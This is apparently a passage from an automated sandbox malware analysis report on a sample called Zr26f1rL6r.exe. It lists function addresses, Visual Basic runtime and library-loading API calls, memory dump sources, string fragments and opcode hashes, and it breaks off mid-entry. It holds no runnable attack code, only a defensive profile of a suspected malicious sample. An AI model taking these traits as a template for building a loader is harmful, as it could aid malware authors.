Instruction Fuzzy Hash: 920126355D834ACBCB18AE3085823EDB7A5EF51360F96556CCCD267446D72540CACF03

Uniqueness

Uniqueness Score: -1.00%

Function 004013B4, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(00402510), ref: 004013B9

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: 3dce9b3da0484dfc767d3d1118ca09d2460f8d38d850699b4a84e8edd8a7beb3
Instruction ID: 84cf40644059cba91e8f92e1df72062d9aa4bec08f084cf555762f4b0e6bb3ab
Opcode Fuzzy Hash: 3dce9b3da0484dfc767d3d1118ca09d2460f8d38d850699b4a84e8edd8a7beb3
Instruction Fuzzy Hash: B3E024A0A8F3D16EE70323700C255167F748E5B64031F54EBC182EB4F3D0690849C33A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02321490, Relevance: 4.6, Strings: 3, Instructions: 843COMMON

Download Yara Rule

Strings

*5dz, xrefs: 02321DB6
EK], xrefs: 02311450
D4Z, xrefs: 023221F4

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: *5dz$D4Z$EK]
API String ID: 3389902171-1474308881
Opcode ID: 4c25ad8e37d00b6a388c9c883b9f8fe96e4ff8592503b7824071069bce639471
Instruction ID: 6dabfbcadd94453f88611804e7ab1202345823b70461113546f90eb36b37d58d
Opcode Fuzzy Hash: 4c25ad8e37d00b6a388c9c883b9f8fe96e4ff8592503b7824071069bce639471
Instruction Fuzzy Hash: 2E624B315083868FDF358F3889987DB7BA2AF56360F4982AECCD98F596D3318546C712

Uniqueness

Uniqueness Score: -1.00%

Function 0231A574, Relevance: 2.7, Strings: 2, Instructions: 217libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6

Strings

H+m, xrefs: 0231A66D
}#c, xrefs: 0231A819

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$}#c
API String ID: 1029625771-2095270229
Opcode ID: f318be4968c694413733821e36e23b0712838428202f1cf5ed69a111eaabc949
Instruction ID: 6ff51f64cd888880b161d7e90896e5489ab015a374b1a03a9d22b5189e165947
Opcode Fuzzy Hash: f318be4968c694413733821e36e23b0712838428202f1cf5ed69a111eaabc949
Instruction Fuzzy Hash: F68115717043098FEB389E398EA57EB7BB7EF85350F95811DDD8A87148D3358485CA02

Uniqueness

Uniqueness Score: -1.00%

Function 0231FCC1, Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

`rE, xrefs: 0231FE06

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID: `rE
API String ID: 0-770150655
Opcode ID: 96df2268e55ba0e22f83ecce8ae5bb83bc3889e052646db66442caa01f07f649
Instruction ID: 53e12de9df3619502fe841a80ba2f07e9d47986baa5ffd84a4cdef4d3011b4af
Opcode Fuzzy Hash: 96df2268e55ba0e22f83ecce8ae5bb83bc3889e052646db66442caa01f07f649
Instruction Fuzzy Hash: 2F115171300785DFCB38DE28C9D4BEB73A2AF99750F56856ADC0A8BA19C331D941CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0232045A, Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

vm, xrefs: 02320464

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID: vm
API String ID: 0-3678984662
Opcode ID: 411d2ccf735ade96d674fbf4149d11b1c188fc96c0c81393bd6a416fca3f7862
Instruction ID: b8b9fcafd7fc8235984e8261b0abeba9e7ae6fafe313212b3e61da6b8016b76b
Opcode Fuzzy Hash: 411d2ccf735ade96d674fbf4149d11b1c188fc96c0c81393bd6a416fca3f7862
Instruction Fuzzy Hash: E4C08076B0E0B74E0FF52478375415764429BD5614F17C6905876F394CD940CECD4C43

Uniqueness

Uniqueness Score: -1.00%

Function 0231523E, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f77bc36bc36a33d5dd8b9a489b757c6dd11c041e9349af78a4cb13a0a0ada5
Instruction ID: d3730bf44bac115e09534f6df03ea8ee0d496b340848c6b32338773f956a5f58
Opcode Fuzzy Hash: 08f77bc36bc36a33d5dd8b9a489b757c6dd11c041e9349af78a4cb13a0a0ada5
Instruction Fuzzy Hash: F851E132548288CFC73D4F74DC953CA7F60EF86314F681A9EC9988B952C2289C47C781

Uniqueness

Uniqueness Score: -1.00%

Function 023104A3, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 409a5f5028d64aafd07f3c2cde1e0d623dfa3841b60148134ded317e31afbc55
Instruction ID: 28e3451949757b3fdd123aa6307080d8eb57e3ee79e07672b57f260373778c51
Opcode Fuzzy Hash: 409a5f5028d64aafd07f3c2cde1e0d623dfa3841b60148134ded317e31afbc55
Instruction Fuzzy Hash: 3A5136746043068FDB18CE24C5E47AA739AAF81350F65C5ADDC898B665C73EC88ACA15

Uniqueness

Uniqueness Score: -1.00%

Function 00401536, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727

Uniqueness

Uniqueness Score: -1.00%

Function 02315814, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78620046c859d98c365753b2ba2a2a77835b8632657ca603a338d3e691fd27c4
Instruction ID: f742258c29c96eb301f3374961b86f2f507bb876785437620c778b97528bce72
Opcode Fuzzy Hash: 78620046c859d98c365753b2ba2a2a77835b8632657ca603a338d3e691fd27c4
Instruction Fuzzy Hash: 8841FC326566088BD7199F78C504ADA7BF6DF80310F505B4EC6559BA0AC334AC12C7C2

Uniqueness

Uniqueness Score: -1.00%

Function 02311069, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8e31eb5ad49c94e43c815688fe01767b795d8aff5dcdc482044425ef0efeafd4
Instruction ID: 1c212c31a8913984749a04b9d96d02a4f9de175d7f170807c21293d8bec752dd
Opcode Fuzzy Hash: 8e31eb5ad49c94e43c815688fe01767b795d8aff5dcdc482044425ef0efeafd4
Instruction Fuzzy Hash: A831BF719092C69FC70ECF3898552D6BFB1EF87214B190AAECAC8CF517D622480BCB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401772, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727

Uniqueness

Uniqueness Score: -1.00%

Function 00401725, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12

Uniqueness

Uniqueness Score: -1.00%

Function 0231F3CA, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74a65d4059a1ebda17d342bd04d492b7f102559611f1bf076c1d81f5999dcb0
Instruction ID: 2b6a72cd7021bf0c3b12a364decba313c58299517665f3af0cb5e473ee0c79a8
Opcode Fuzzy Hash: f74a65d4059a1ebda17d342bd04d492b7f102559611f1bf076c1d81f5999dcb0
Instruction Fuzzy Hash: C2B092303616808FC756DE19C195F8173B0FF00E80F8249C8E8118BA12C368EA008A20

Uniqueness

Uniqueness Score: -1.00%

Function 0041B070, Relevance: 82.6, APIs: 44, Strings: 3, Instructions: 368COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B0E4
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B109
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000060), ref: 0041B12D
__vbaStrCat.MSVBVM60(?,About ), ref: 0041B141
__vbaStrMove.MSVBVM60 ref: 0041B152
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402E04,00000054), ref: 0041B16E
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041B182
__vbaFreeObj.MSVBVM60 ref: 0041B18E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041B1A2
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B1C1
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B1E6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,000000B8), ref: 0041B20C
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B221
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B246
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,000000C0), ref: 0041B26C
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B281
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B2A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,000000C8), ref: 0041B2CC
__vbaStrI2.MSVBVM60(?,Version ), ref: 0041B2DF
__vbaStrMove.MSVBVM60 ref: 0041B2EA
__vbaStrCat.MSVBVM60(00000000), ref: 0041B2F3
__vbaStrMove.MSVBVM60 ref: 0041B2FA
__vbaStrCat.MSVBVM60(004034C4,00000000), ref: 0041B302
__vbaStrMove.MSVBVM60 ref: 0041B309
__vbaStrI2.MSVBVM60(?,00000000), ref: 0041B310
__vbaStrMove.MSVBVM60 ref: 0041B31B
__vbaStrCat.MSVBVM60(00000000), ref: 0041B31E
__vbaStrMove.MSVBVM60 ref: 0041B325
__vbaStrCat.MSVBVM60(004034C4,00000000), ref: 0041B32D
__vbaStrMove.MSVBVM60 ref: 0041B334
__vbaStrI2.MSVBVM60(?,00000000), ref: 0041B33B
__vbaStrMove.MSVBVM60 ref: 0041B346
__vbaStrCat.MSVBVM60(00000000), ref: 0041B349
__vbaStrMove.MSVBVM60 ref: 0041B350
__vbaHresultCheckObj.MSVBVM60(00000000,?,004034C8,00000054), ref: 0041B372
__vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,?,?), ref: 0041B39E
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041B3B6
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041B3D2
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041B3F7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000060), ref: 0041B417
__vbaVarLateMemSt.MSVBVM60(?,Caption), ref: 0041B44D
__vbaFreeObj.MSVBVM60 ref: 0041B456
__vbaFreeVar.MSVBVM60 ref: 0041B45F
__vbaFreeVar.MSVBVM60(0041B4C3), ref: 0041B4BC

Strings

Caption, xrefs: 0041B43A
Version , xrefs: 0041B2D9
About , xrefs: 0041B13B

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: __vba$CheckHresult$Move$Free$New2$List$Late
String ID: About $Caption$Version
API String ID: 760940201-2818086185
Opcode ID: 882defc9a301ef7908dc681ee1135a14bf45d88bb0d58b1aa2110035774394c4
Instruction ID: 59cc00b6a757b89c4aaec9fdd6ae4edb412b36b00a03ebdf9567368346b1527a
Opcode Fuzzy Hash: 882defc9a301ef7908dc681ee1135a14bf45d88bb0d58b1aa2110035774394c4
Instruction Fuzzy Hash: ACD16E71A00208ABDB10EFA5DD48EDEBBB8FF58701F10412AF541F72A0D774A945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4A0, Relevance: 51.3, APIs: 34, Instructions: 287COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 0041E512
__vbaVarMove.MSVBVM60 ref: 0041E542
__vbaVarCopy.MSVBVM60 ref: 0041E56E
__vbaVarMove.MSVBVM60 ref: 0041E592
__vbaVarCopy.MSVBVM60 ref: 0041E5C3
#668.MSVBVM60(?,?), ref: 0041E5CD
__vbaErase.MSVBVM60(00000000,?), ref: 0041E5D8
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041E5FD
__vbaFreeVar.MSVBVM60 ref: 0041E609
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041E62A
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041E655
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000068), ref: 0041E680
__vbaFreeObj.MSVBVM60 ref: 0041E685
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041E69D
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041E6C2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000130), ref: 0041E6E8
__vbaStrMove.MSVBVM60 ref: 0041E6F3
__vbaFreeObj.MSVBVM60 ref: 0041E6FC
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041E714
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041E739
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000130), ref: 0041E75F
__vbaStrMove.MSVBVM60 ref: 0041E76A
__vbaFreeObj.MSVBVM60 ref: 0041E773
__vbaNew2.MSVBVM60(00403940,00420010), ref: 0041E78C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E7A5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,000000E8), ref: 0041E7CC
#716.MSVBVM60(?,?,00000000), ref: 0041E7D7
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041E7FE
__vbaFreeStr.MSVBVM60 ref: 0041E807
__vbaFreeObj.MSVBVM60 ref: 0041E810
__vbaFreeVar.MSVBVM60 ref: 0041E819
__vbaFreeObj.MSVBVM60(0041E87A), ref: 0041E863
__vbaFreeStr.MSVBVM60 ref: 0041E872
__vbaFreeStr.MSVBVM60 ref: 0041E877

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$Copy$#668#716EraseLateRedim
String ID:
API String ID: 2446290755-0
Opcode ID: 5e6c63fb53cbc4ba6585c2edbdc6012183d2a4a86fd8485301f0d51f7837dd05
Instruction ID: 0370d614862ee785207eee18f9a01079d4b65040b2ffe8b3f788d5075672e42d
Opcode Fuzzy Hash: 5e6c63fb53cbc4ba6585c2edbdc6012183d2a4a86fd8485301f0d51f7837dd05
Instruction Fuzzy Hash: 5FB14C71900218AFCB14DFA8DD88EEDBBB8FB58715F10811AF505B72A0CB749945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040533D, Relevance: 34.7, APIs: 23, Instructions: 165COMMON

Download Yara Rule

APIs

#632.MSVBVM60(?,?,00000000,?), ref: 0041B579
__vbaStrVarVal.MSVBVM60(?,?), ref: 0041B587
#516.MSVBVM60(00000000), ref: 0041B58E
__vbaFreeStr.MSVBVM60 ref: 0041B5A4
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041B5B4
#617.MSVBVM60(00000002,?,?), ref: 0041B5E6
__vbaStrVarMove.MSVBVM60(00000002), ref: 0041B617
__vbaStrMove.MSVBVM60 ref: 0041B622
__vbaFreeVar.MSVBVM60 ref: 0041B62B
__vbaI4Var.MSVBVM60(?), ref: 0041B63B
__vbaStrToAnsi.MSVBVM60(?,?,?), ref: 0041B655
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000), ref: 0041B66A
__vbaI4Var.MSVBVM60(?,00000000,?,00000000,?,00000000), ref: 0041B671
__vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0041B67B
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000), ref: 0041B68C
__vbaVarCopy.MSVBVM60(?,00000000,?,00000000), ref: 0041B6AB
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000), ref: 0041B6B9
__vbaVarMove.MSVBVM60(?,00000000,?,00000000), ref: 0041B6D0
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,?,00000000), ref: 0041B6E0
__vbaFreeVar.MSVBVM60(0041B733,?,?,00000000), ref: 0041B71D
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 0041B722
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 0041B727
__vbaFreeStr.MSVBVM60(?,?,00000000), ref: 0041B72C

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: __vba$Free$Move$AnsiListUnicode$#516#617#632CopyErrorSystem
String ID:
API String ID: 1359953636-0
Opcode ID: 9239c16675f6737271e3abc46f994c053cb59be26f4c00da76b1e0933eb010b2
Instruction ID: f8748de5d8dfa4c9ea220443aec8d7b7af97ed888a63c04239baa84b9493184e
Opcode Fuzzy Hash: 9239c16675f6737271e3abc46f994c053cb59be26f4c00da76b1e0933eb010b2
Instruction Fuzzy Hash: 546108B1C002189BCB14DFA4DD84ADDFBB8FF98300F10815AE50AA7264DB746A89CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFB0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(028E7E3B,00000000,00000000), ref: 0041F052
__vbaI4Cy.MSVBVM60(00000000), ref: 0041F05A
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041F072
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041F097
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,0000013C), ref: 0041F0E8
__vbaFreeObj.MSVBVM60 ref: 0041F0F1

Strings

srlove, xrefs: 0041F0C5

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: __vba$CheckHresult$ErrorFreeNew2System
String ID: srlove
API String ID: 3252491692-3382764130
Opcode ID: 6ab643d18e96d9154a4f2352178d4efe6195a4dd7b2dc2826a0d1aa3c4502522
Instruction ID: e39d5f927d9cd803004f82839173b74c41ae1db6a0eeb60acdb927c7fa679f2b
Opcode Fuzzy Hash: 6ab643d18e96d9154a4f2352178d4efe6195a4dd7b2dc2826a0d1aa3c4502522
Instruction Fuzzy Hash: 8A4171B1900318AFDB14EFA4DC85AAEBBB8FF49700F14403EE109B7251D7785945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041E360, Relevance: 12.1, APIs: 8, Instructions: 87COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00403940,00420010,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E3B3
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E3D2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000218,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E3F1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E400
__vbaNew2.MSVBVM60(00403940,00420010,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E415
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E42E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000130,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E451
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E460

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: b72ac1ca96013998f30f58f5ce955f9ebe32a14dc4cb9828129f9c6e41ae8a20
Instruction ID: c44e23a08aee3f12305fa8a1105f26e33cb4a420ca09db4508c04ff095e2b64b
Opcode Fuzzy Hash: b72ac1ca96013998f30f58f5ce955f9ebe32a14dc4cb9828129f9c6e41ae8a20
Instruction Fuzzy Hash: B8316F74A00209ABCB10DFA5DD89F9ABBF8FF08700F50453AF945F7291C6789941CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED10, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00403940,00420010), ref: 0041ED53
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041ED6C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000220), ref: 0041EDAF
__vbaFreeObj.MSVBVM60 ref: 0041EDB8

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: 45dea64dfa8ffb28d7682d16bfe2582be59a3224a2fa983418031c34f0819343
Instruction ID: dfa46045771730cda4d46929efb9b60e5b86bbc2597fdc2c5a352414bebf3dbe
Opcode Fuzzy Hash: 45dea64dfa8ffb28d7682d16bfe2582be59a3224a2fa983418031c34f0819343
Instruction Fuzzy Hash: 82119074A00305AFD710DFA9EA49F9ABBF8FB08701F10852AF545F7290D7785841CBA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Zr26f1rL6r.exe PID: 6600 Parent PID: 6656 Zr26f1rL6r.exeCOMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 1E902EB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902EBA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b6d9129e6853d94f6aeec4a048ec9db0758e1301701be173fdff541fbfa78f3
